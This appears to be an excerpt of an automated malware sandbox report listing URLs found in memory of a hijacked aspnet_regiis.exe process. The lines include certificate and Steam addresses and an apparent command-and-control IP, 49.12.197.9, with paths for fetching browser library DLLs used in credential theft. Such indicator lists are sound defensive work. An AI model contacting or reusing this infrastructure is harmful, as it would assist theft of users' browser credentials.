Source: aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1857214387.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: aspnet_regiis.exe, 00000003.00000003.1857621759.0000000002DB6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: aspnet_regiis.exe, 00000003.00000003.1857621759.0000000002DB6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: aspnet_regiis.exe, 00000003.00000003.1857621759.0000000002DB6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1857214387.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: aspnet_regiis.exe, 00000003.00000003.1857621759.0000000002DB6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: file.exe	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: file.exe	String found in binary or memory: http://ocsp.comodoca.com0
Source: aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1857214387.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: aspnet_regiis.exe, 00000003.00000003.1857621759.0000000002DB6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: aspnet_regiis.exe, 00000003.00000003.1857621759.0000000002DB6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: aspnet_regiis.exe, 00000003.00000003.1857621759.0000000002DB6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: file.exe	String found in binary or memory: http://ocsp.sectigo.com0
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Amcache.hve.3.dr	String found in binary or memory: http://upx.sf.net
Source: aspnet_regiis.exe, 00000003.00000003.1857621759.0000000002DB6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: aspnet_regiis.exe, aspnet_regiis.exe, 00000003.00000002.2680382031.000000006CADD000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: aspnet_regiis.exe, 00000003.00000002.2662565963.0000000021DBD000.00000002.00001000.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 76561199780418869[1].htm.3.dr	String found in binary or memory: https://49.12.197.9
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1835858623.0000000002DEB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1835103038.0000000002DE2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1835626420.0000000002DEB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1835103038.0000000002DEB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1811708596.0000000002DE2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1835747383.0000000002DEB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/0
Source: aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1937588640.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1903702443.0000000002DED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/12.197.9/
Source: aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1937588640.0000000002DED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/5
Source: aspnet_regiis.exe, 00000003.00000003.1984089930.0000000002DEF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/HIIJJJKEGI
Source: aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/I
Source: aspnet_regiis.exe, 00000003.00000003.1984089930.0000000002DE2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/W
Source: aspnet_regiis.exe, 00000003.00000003.1984089930.0000000002DE2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/c
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/freebl3.dll
Source: aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/g
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/mozglue.dll(
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/mozglue.dllL
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/msvcp140.dll
Source: aspnet_regiis.exe, 00000003.00000003.1972492301.0000000002DE2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/nss3.dll
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/nss3.dll#
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/softokn3.dll
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/softokn3.dllB
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/sqlp.dll
Source: aspnet_regiis.exe, 00000003.00000003.1937588640.0000000002DE2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/vcruntime140.dll
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/vcruntime140.dllq
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9CBAAEC
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9FIDBFC
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9JKFIDBFC--
Source: aspnet_regiis.exe, 00000003.00000003.1819386724.0000000002E0B000.00000004.00000020.00020000.00000000.sdmp, BGIIEG.3.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a
Source: 76561199780418869[1].htm.3.dr	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp, DBFIEH.3.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp, DBFIEH.3.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&cta
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
Source: aspnet_regiis.exe, 00000003.00000003.1819386724.0000000002E0B000.00000004.00000020.00020000.00000000.sdmp, BGIIEG.3.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: aspnet_regiis.exe, 00000003.00000003.1819386724.0000000002E0B000.00000004.00000020.00020000.00000000.sdmp, BGIIEG.3.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: aspnet_regiis.exe, 00000003.00000003.1819386724.0000000002E0B000.00000004.00000020.00020000.00000000.sdmp, BGIIEG.3.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.co
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&a
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
